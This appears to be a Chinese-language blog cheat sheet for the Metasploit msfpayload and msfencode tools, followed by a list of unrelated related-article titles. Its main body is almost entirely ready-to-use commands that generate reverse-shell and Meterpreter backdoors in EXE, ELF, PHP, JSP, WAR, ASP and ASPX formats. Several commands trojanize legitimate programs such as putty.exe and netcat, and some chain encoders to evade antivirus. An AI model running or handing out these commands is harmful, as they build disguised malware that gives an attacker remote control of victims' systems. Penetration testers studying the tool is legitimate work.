msfpayload即将在2015年6月18日弃用,用msfvenmon替代

msfpayload -h

msfpayload的帮助信息。

msfpayload -l | grep windows

msfpayload -l | grep linux

msfpayload -l | grep andriod

列出某个平台的pyloads

msfpayload windows/meterpreter/bind_tcp S

查看需要设置参数

msfpayload windows/meterpreter/bind_tcp O

列出所有windows/meterpreter/bind_tcp下可用的***载荷的配置项(任何***载荷都是可用配置的)。

msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT X > payload.exe

创建一个metasploit的reverse_tcp***载荷,回连到LHOSTip的LPORT,将其保存为名为payload.exe的windows下可执行程序。

msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT R > payload.raw

创建一个metasploit的reverse_tcp***载荷,回连到LHOSTip的LPORT,将其保存为名payload.raw,该文件后面的msffencode中使用。

msfpayload windows/meterpreter/reverse_tcp LPORT=PORT C > payload.c

创建一个metasploit的reverse_tcp***载荷,导出C格式的shellcode。

msfpayload windows/meterpreter/reverse_tcp LPORT=PORT J > payload.java

创建一个metasploit的reverse_tcp***载荷,导出成以%u编码方式的javaScript语言字符串。

msfpayload与可执行文件帮顶,如netcat

root@bt:~# msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LHOST=10.0.0.1 LPORT=5555 R | msfencode -a x86 -e x86/alpha_mixed -k -x /bin/netcat -t elf -o nc

msfpayload生成linux backdooroot@bt:~# msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.7.102 LPORT=5555 X > linux2

msfpayload生成exe backdoorroot@bt:~#msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=5555 R | msfencode -t exe -c 5 > /root/Desktop/door.exe

root@bt:~#msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=5555 R | msfencode -t exe -c 5 -k -x /root/putty.exe -o /root/Desktop/puttydoor.exe

root@bt:~#msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 10 X > shell.bin

root@bt:~#msfpayload windows/shell/reverse_tcp  LHOST=10.0.0.1 LPORT=4443 EXITFUNC=thread R |  msfencode -e x86/shikata_ga_nai -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor  -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor  -c 2 -t exe -o door.exe

msfpayload生成jsp backdooroot@bt:~# msfpayload java/jsp_shell_reverse_tcp LHOST=10.1.1.1 LPORT=5555 R > door.jsp

msfpayload生成war backdoo

root@bt:~# msfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.1 LPORT=5555 W > door.war

msfpayload生成php backdoor

root@bt:~# msfpayload php/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e php/base64 -t raw -o base64php.php

msfpayload生成asp backdoorroot@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -a x86  -t asp -o door2.asp

msfpayload生成aspx backdoor

root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -a x86  -t aspx -o door.aspx

目标是内网时,常用的payload选着如:root@bt:~# msfpayload windows/meterpreter/reverse_tcp_allports LHOST=192.168.1.6 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -o allports.exe

root@bt:~# msfpayload windows/meterpreter/reverse_http LHOST=192.168.1.6 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -o httpports.exe

msf payload php,Metasploit(四)--Msfpayload命令相关推荐

  1. msf payload php,msfpayload和msfencode的介绍_91Ri.org

    网上说用msfpayload 生成什么注入进程什么攻击后门,后边的注入进程是吓唬人的,就是一种进程隐藏技术不理解没关系(解释一下:进程注入是指将可恶意的可执行代码注入到一个已经运行的进程一般是合法系统 ...

  2. MSF常用的监听模块命令

    msfpayload 命令 帮助 msfpayload -h 列出所有可用的***载荷 msfpayload windows/meterpreter/bind_tcp O 列出所有windows/me ...

  3. RCE、exp、Exploit、Exploit Pack、exp-gui、Payload、MetaSploit都是啥

    对于走在安全路上的小菜来说,这几个exp.Exploit.Exploit Pack.exp-gui.Payload.MetaSploit名词着实把人转的不轻,下面给大家解释下: RCE,remote ...

  4. windows opensshd 连接就close_基于Windows白名单执行Payload上线Metasploit 渗透红队笔记...

    渗透攻击红队 一个专注于红队攻击的公众号 大家好,这里是 渗透攻击红队 的第 17 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深), 不出意外每天一更 基于白名单绕过 测试环境 攻击机 ...

  5. zookeeper命令行(zkCli.shzkServer.sh)使用及四字命令

    zookeeper提供了很多方便的功能,方便我们查看服务器的状态,增加,修改,删除数据(入口是zkServer.sh和zkCli.sh). 还提供了一系列四字命令,方便我们跟服务器进行各种交互,来确认 ...

  6. kinux查日志_Linux实时查看日志的四种命令详解

    原标题:Linux实时查看日志的四种命令详解 如何在Linux中实时查看日志文件的内容?那么有很多实用程序可以帮助用户在文件更改或不断更新时输出文件的内容.在Linux中实时显示文件内容的常用命令是t ...

  7. zookeeper 四字命令的使用

    Linux中的命令NetCat有"瑞士军刀"的美誉.我们可以通过nc命令查看Zookeeper的一行属性数据.在Zookeeper中有很多四字命令,汇总如下: 序号 使用命令 输出 ...

  8. zookeeper的acl权限控制_zookeeper权限acl与四字命令

    权限acl介绍,acl的构成与id acl是Access control lists 的缩写,也就是权限控制列表: 针对节点可以设置相关读写等权限,目的是为了保障数据安全性 权限permissions ...

  9. 开启 Zookeeper 四字命令(is not executed because it is not in the whitelist)

    有时候我们需要使用四字命令查看 ZK 的一些信息,如果没有配置开启,救会出现这样的异常: ➜ bin echo mntr | nc localhost 2181 mntr is not execute ...

最新文章

  1. SVN可以拉项目但是提交时提示没有权限
  2. Kubernetes之路 1 - Java应用资源限制的迷思
  3. 总结JavaScript(Iframe、window.open、window.showModalDialog)父窗口与子窗口之间的操作
  4. iphone固件降级_iPhone无法开机怎么办?三种快速维修方法
  5. php获取模型错误,php – 解析错误,期望activecollab模型类中出现“T_PAAMAYIM_NEKUDOTAYIM”错误...
  6. 风控建模:催收评分卡(四)--变量整理除了跟数据获取相关外还跟什么有关系?
  7. python中PIL.Image,OpenCV,Numpy图像格式相互转换
  8. 总结命令----tar
  9. rehat 出现GDB debuginfo-install 问题处理
  10. USB 重定向库usbredir的移植到Android下使用的方法总结
  11. 电气防火限流式保护器及其过电流故障检测方法
  12. [密码学]利用docker安装与使用sagemath
  13. Android Studio 必备技巧:TODO 用法及自定义 TODO
  14. ADB命令使用大全及使用原理
  15. 观点 | ​苏宁传统零售业“数字化转型”经验分享
  16. 台湾榜首iPhone游戏创作者谈开发成败
  17. 今天面了个腾讯拿30k出来的,真是小母牛按门铃,牛逼到家了
  18. CSS基本语法_html-css
  19. Windows 10 1909(19H2) 精简纯净版PE系统
  20. 【Android 系统开发】 编译 Android文件系统 u-boot 内核 并烧写到 OK-6410A 开发板上

热门文章

  1. RAML用户应遵循的C#与Web API代码生成模式
  2. Java 数字相关操作通用类 NumberUtils.java
  3. Can't create directory 'E:\Repositories\***\db\transactions\138-41.txn':
  4. Android Studio之编译提示\app\src\main\res\values\colors.xml:1:1 Error:前言有不允许的内容
  5. linux shell之得到当前路径下的目录
  6. IOS之学习笔记六(可变形参)
  7. Android之用命令uninstall卸载apk和用 -i 过滤日志忽略大小写
  8. 这种动作片还需要汽车特效?
  9. 理科生浪漫起来,谁都顶不住!
  10. 程序员没有女朋友的原因,我终于找到了!